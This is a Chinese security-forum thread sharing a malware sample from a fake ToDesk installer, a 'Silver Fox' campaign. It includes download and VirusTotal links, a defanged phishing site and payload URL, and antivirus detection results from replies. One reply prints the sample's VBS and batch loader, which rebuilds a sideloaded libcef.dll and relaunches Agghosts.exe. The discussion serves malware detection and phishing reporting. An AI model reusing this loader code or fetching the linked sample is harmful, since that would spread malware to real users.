查看: 4413|回复: 19
收起左侧

[病毒样本] 我上次发的那个超毒银狐网站又解析到了一个新银狐 vt首发:11/59

[复制链接]
ulyanov2233
发表于 2025-7-3 07:31:07 | 显示全部楼层 |阅读模式
本帖最后由 ulyanov2233 于 2025-7-3 07:44 编辑

这次水平没有上次高了【todesk-link】密码:infected
链接:https://qfile.qq.com/q/lWbs5N1gMU
vt;https://www.virustotal.com/gui/f ... e1d5afc3c?nocache=1微步云首发鉴定为银狐:https://s.threatbook.com/report/ ... d1aa3857d8e1d5afc3c
毒网地址;hxxps://todesk-link.com/download/
实际下载地址变了;hxxps://oss-app-hk.oss-cn-hongkong.aliyuncs.com/object/todesk-link.msi
辛苦大家点点举报钓鱼网站,这个钓鱼网站很狡猾,昨天还把下载链接解析到官方todesk逃避钓鱼网站检测


评分

参与人数 1人气 +1 收起 理由
tony099 + 1 精品文章

查看全部评分

jxfaiu
发表于 2025-7-3 08:17:39 | 显示全部楼层
扫描杀


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
1073328164
发表于 2025-7-3 08:48:56 | 显示全部楼层
迈克菲 kill

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
ongarabazanade
发表于 2025-7-3 08:56:48 | 显示全部楼层
本帖最后由 ongarabazanade 于 2025-7-3 09:00 编辑

360扫描miss没双击火绒kill


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
ulyanov2233
 楼主| 发表于 2025-7-3 09:23:54 | 显示全部楼层
ongarabazanade 发表于 2025-7-3 08:56
360扫描miss没双击火绒kill

火绒又是这个人工鉴定的bat病毒名,看来人工看过了
PhozeAMTB
发表于 2025-7-3 09:32:31 | 显示全部楼层
WD 扫描miss 双击Kill

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
GDHJDSYDH
发表于 2025-7-3 10:00:22 | 显示全部楼层
EIS扫描kill

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
ongarabazanade
发表于 2025-7-3 10:27:17 | 显示全部楼层
ulyanov2233 发表于 2025-7-3 09:23
火绒又是这个人工鉴定的bat病毒名,看来人工看过了

感谢楼主提醒,没想到火绒人工鉴定还挺迅速,以后用的就更放心了,希望火绒越来越好用吧。
wowocock
发表于 2025-7-3 10:31:03 | 显示全部楼层
ulyanov2233 发表于 2025-7-3 09:23
火绒又是这个人工鉴定的bat病毒名,看来人工看过了

这种只能人工鉴定吧 。
set ws=wscript.createobject("wscript.shell")
ws.run "C:\ProgramData\cba.bat",0



@echo off
:Z
copy /b C:\ProgramData\a.ini+C:\ProgramData\l.dll C:\ProgramData\libcef.dll"
IF EXIST "C:\ProgramData\libcef.dll" GOTO Y
GOTO Z
:Y
start C:\ProgramData\Agghosts.exe
@ping 127.0.0.1 -n 1 >nul
tasklist|findstr /i "Agghosts.exe" ||goto Z
exit
inhh1
发表于 2025-7-3 10:38:44 | 显示全部楼层
本帖最后由 inhh1 于 2025-7-3 10:46 编辑

C:\Users\Public\Documents\libcef.dll 是恶意软件 AI:Emotet.45841.3E1C5FA017
C:\Program Files\Windows Defenderi\xfNnRDR83c\libcef.dll 是恶意软件 Trojan.Generic.37916281
怎么释放了两个,报毒名还不一样
以及:BD引擎貌似对这个处理有区别,vt上有bd引擎报出来的,但是bd本家没报出来,杀的衍生,很奇怪
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2026-2-2 20:15 , Processed in 0.074340 second(s), 3 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表